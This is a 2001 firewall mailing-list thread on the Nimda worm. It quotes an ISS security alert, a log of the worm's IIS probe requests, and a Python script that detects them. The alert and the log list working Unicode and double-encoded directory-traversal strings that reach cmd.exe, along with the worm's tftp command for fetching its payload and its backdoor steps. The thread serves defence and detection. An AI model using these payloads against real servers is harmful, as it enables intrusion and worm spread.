
RE: [FW1] New worm on the road?



Dean,
 
You're absolutely right, although in that case an FTP request to the outside originated from an IIS will go in the same kind of logging (same rule number) as with a user who installed "sponsored" freeware such as winzip that tries to use FTP to get its latest publicity banners.  I prefer to have separate rules for all servers so I can put proper alarms on those rules.
 
I must admit that I also run snort, both on the outside, DMZ and inside.  This really gives me a good insight into what happens.
 
 
Patrick Coomans.
4all NetWorks, your Networking partner!
Molenstraat 65 - 2840 Reet - Belgium
Tel +32-3-880.75.75  Fax 880.75.71
Web site : http://www.4all.be
 
"   Over-reliance on experience
  leads to making the same mistakes
with increasing levels of confidence.  "

>>> Dean Cunningham <[email protected]> 25/09/01 07:21 >>>

For NT shops:
I have forced all that http ftp traffic via a proxy (MS Proxy) that requires
authentication against the NT domain, based on the theory that any
compromise will use a local machine account and therefore either a) not use
the proxy and try going out the firewall or b) use the proxy and get dropped
because it was not authenticated.

any thoughts

cheers
Dean

-----Original Message-----
From: Patrick Coomans [mailto:[email protected]]
Sent: Sunday, 23 September 2001 9:00 a.m.
To: [email protected]
Subject: RE: [FW1] New worm on the road?


Dennis,

Outgoing ftp, tftp, http, ...  from an internal server source is at least
*very* suspicious and probably caused by some hacker who is trying to fetch
his/her tools etc., so I put proper alerts on a specific rule for this kind
of traffic on my fw1.

Patrick

>>> <[email protected]> 20/09/01 17:52 >>>


Do you mind sharing what you did to accomplish number 2?

-----Original Message-----
From: [email protected]
[mailto:[email protected]]On Behalf Of Patrick
Coomans
Sent: Wednesday, September 19, 2001 1:04 AM
To: [email protected]
Cc: [email protected]
Subject: Re: [FW1] New worm on the road?


Thanks for all the replies,
Some of the things I did to secure IIS servers were:

1) continuously install all the latest patches for IIS
2) put alerts on all suspicious outgoing traffic from IIS servers
3) install a product on the IIS servers that performs auto-blocking of the
source IP address when Nimda or Code Red I/II is detected
4) download and install the URL Scan utility from Microsoft

Patrick

>>> LEFEVRE David <[email protected]> 19/09/01 09:09 >>>
I've found this on another mailing list (Xforce)

Internet Security Systems Security Alert
September 18, 2001

Aggressive Propagation of Nimda Worm

Synopsis:

ISS X-Force has captured a new Internet worm, known as Nimda, that
contains much of the functionality of Code Red worm and its
derivatives. Nimda attempts to identify vulnerable Microsoft IIS servers
and deface them, and attempts to infect additional systems. Nimda is
potentially more dangerous than Code Red or Code Blue, because it
includes a powerful e-mail distribution component. Code Red was limited
to infecting Web servers running IIS. Nimda, on the other hand, can
infect any Windows system, and then distribute further by emailing
copies of itself to individuals in MAPI (Messaging Application
Programming Interface) address books, or by identifying and infecting
vulnerable IIS servers. This distinction means that there may be
millions of infections. Indications of severe network outages related
to the massive amount of network traffic this worm generates have
already been reported.

Description:

Nimda is vastly different from Code Red in how it propagates. Nimda
takes advantage of standard e-mail distribution techniques to broaden
the eligible pool of target hosts. Instead of only attacking Web servers
with Web server vulnerabilities, Nimda is designed to propagate via
spoofed e-mail. The e-mail is spoofed to appear as if it came from
trusted sources. Nimda relies on extensive local propagation once a
system is infected. It replaces .dll, .eml, .nws files on all shared
drives. It also appends itself to all .htm, .html, and .asp files on
the infected system. This also allows the worm to spread to remote
users when they access Web pages on infected servers.

IIS Scanning and Propagation

Nimda will use several Unicode Web Folder Traversal vulnerability attack
strings to probe for vulnerable IIS systems. The attack strings used are
as follows:

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe is the backdoor that Code Red II installed on infected
servers)

Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack
string and inspects output to determine if the target system is
vulnerable. If a vulnerable IIS Web server is found, Nimda will append
the following command to an attack string to upload a copy of the worm
to the vulnerable server:

tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

E-mail Propagation

Nimda will read the e-mail address books on the infected system. It will
e-mail a copy of itself to each address in the list. The Subject: lines
of the e-mails containing the worm will vary.

Backdoor Functionality

Once a computer is infected with Nimda, the worm takes steps to
"backdoor" the infected system, by creating accounts that could provide
further access to the system by remote attackers. Nimda will create a
"guest" account if it doesn't already exist, or activate it if it has
been disabled. It will also add the guest user to the "Guests" and
"Administrators" groups.

Nimda will also open the "C:" share to the Internet, giving full access
to the C: drive of the infected computer. Attackers from anywhere on the
Internet may access this share with full read/write access, once this
share is opened.

Recommendations:

ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding
signature. This signature was included in Network Sensor X-Press Update
3.1 and Server Sensor 6.0.1. RealSecure Network Sensor also detects the
Nimda worm with the HTTP_Windows_Executable signature.

ISS BlackICE products will trigger the "2000639 - HTTP UTF8 backtick"
and "2002595 - IIS system32 command" events.

ISS Internet Scanner customers can test for this vulnerability using the
IisUnicodeTranslation check, which was included in XPU 4.4 (and later
updated in XPU 4.8).

ISS System Scanner customers can test for this vulnerability using the
MS00-078 check included in XPU 1.13 (#13).

ISS X-Force recommends that all users contact their anti-virus vendor
for software updates and Nimda removal information.

Microsoft IIS administrators who have not yet installed the patch for
the Web Server Folder Traversal vulnerability are encouraged to do so
immediately.

For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

For Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862

The Nimda worm takes advantage of well-known security weaknesses in IIS,
as well as a general lack of security awareness among Internet users
regarding e-mail attachments. ISS recommends that all IIS administrators
apply all security patches immediately and follow published Microsoft
IIS Security Checklists. Please refer to the links in the Additional
Information section.


Additional Information:

ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify that their
IIS Web servers have been configured securely. IIS servers that have
been configured securely, using the Checklists, are not vulnerable to
many of the recent and widely publicized remote IIS exploits.

The IIS Security Checklists are available at the following locations:

For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp

For Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.asp

Web site administrators are also strongly encouraged to apply the latest
IIS cumulative security patch to prevent Web servers from being
compromised by this and other IIS exploits. This patch is available from
the following Microsoft Security Bulletin:

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

______

About Internet Security Systems (ISS)
Internet Security Systems is a leading global provider of security
management solutions for the Internet, protecting digital assets and
ensuring safe and uninterrupted e-business. With its industry-leading
intrusion detection and vulnerability assessment, remote managed
security services, and strategic consulting and education offerings, ISS
is a trusted security provider to more than 8,000 customers worldwide
including 21 of the 25 largest U.S. commercial banks and the top 10 U.S.
telecommunications companies. Founded in 1994, ISS is headquartered in
Atlanta, GA, with additional offices throughout North America and
international operations in Asia, Australia, Europe, Latin America and
the Middle East. For more information, visit the Internet Security
Systems web site at www.iss.net or call.

Copyright (c) 2001 Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of the X-Force. If you wish to reprint the whole or any part
of this Alert in any other medium excluding electronic medium, please
e-mail [email protected] for permission.

Disclaimer

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php
as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force
[email protected] of Internet Security Systems, Inc.

Best regards,
David

Patrick Coomans wrote:

>  Since this evening I am experiencing massive attacks on HTTP (IIS
> oriented I presume) from many different IP addresses. They all look
> like:
>
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>
> Is anyone aware that this is some new kind of worm? Now my FW1 question:
> can I create an HTTP resource (secure server) that blocks all requests
> that e.g. have a .EXE in it?  Or would that slow my FW1's down too
> much? Any other suggestions for good products that can do HTTP content
> inspection and that cooperate or can co-exist with fw1?
>
> Thanks,
> Patrick

--
David LEFEVRE
CARDIF - Architecture et Sécurité Opérationnelle
[email protected] - Tél : 01 41 42 76 63
     [email protected] - Tel : 01 41 42 24 22



***************************************************
This e-mail is  not an  official  statement of  the
Waikato  Regional  Council unless otherwise stated.
Visit our website http://www.ew.govt.nz
***************************************************


================================================================================
     To unsubscribe from this mailing list, please see the instructions at
               http://www.checkpoint.com/services/mailing.html
================================================================================
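The probe strings in the ISS alert above, and in Patrick's log excerpt, are all the same `..\..` traversal hidden behind double percent-encoding or the overlong two-byte sequences the unpatched IIS decoder accepted. The following is an added example, not code from anyone on this thread: it normalizes request paths the way that decoder did and groups matching requests per source address from web server log lines, the kind of per-rule alert Patrick describes. The Common Log Format layout, the sample log lines and the addresses in them are constructed for the example.

```python
import re
# Lenient percent-decoding: a '%' not followed by two hex digits stays literal,
# so "%%35%63" -> "%5c" on the first pass and "\" on the second.
def _percent_decode(data: bytes) -> bytes:
    return re.sub(rb"%([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

# Fold 2-byte sequences the way the unpatched IIS decoder did (MS00-078): the low
# bits of both bytes are combined without checking for a valid continuation byte,
# so %c0%af, %c0%2f, %c1%1c and %c1%9c all come out as a path separator.
def _iis_utf8_fold(data: bytes) -> str:
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return out.decode("latin-1")

def normalize(path: str) -> str:
    # Path as a vulnerable IIS would see it: two decode passes, fold, one slash style.
    data = _percent_decode(_percent_decode(path.encode("latin-1", "replace")))
    return _iis_utf8_fold(data).replace("\\", "/").lower()

# Traversal out of a script directory, or a direct hit on cmd.exe / root.exe.
PROBE = re.compile(r"/\.\./|/system32/cmd\.exe$|/root\.exe$")
def is_nimda_probe(request_line: str) -> bool:
    """True when the request path (query stripped) matches a probe from the alert."""
    parts = request_line.split()
    return len(parts) >= 2 and PROBE.search(normalize(parts[1].split("?")[0])) is not None

# Common Log Format: client IP is the first field, request line the first quoted one.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)"')
def scan_log(lines):
    """Map source IP -> probe paths, the grouping a per-source alert would key on."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_nimda_probe(m.group(2)):
            hits.setdefault(m.group(1), []).append(m.group(2).split()[1])
    return hits

# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2001:22:10:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.77 - - [18/Sep/2001:22:10:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.77 - - [18/Sep/2001:22:10:05 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '198.51.100.3 - - [18/Sep/2001:22:10:11 +0200] "GET /scripts/search.asp?q=cmd.exe HTTP/1.0" 200 88',
]
```

The last sample line is a benign request that only mentions cmd.exe in its query string; it is not flagged because matching is done on the normalized path, which is also why the dictionary returned by `scan_log(SAMPLE_LOG)` keys on the two probing addresses only.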



 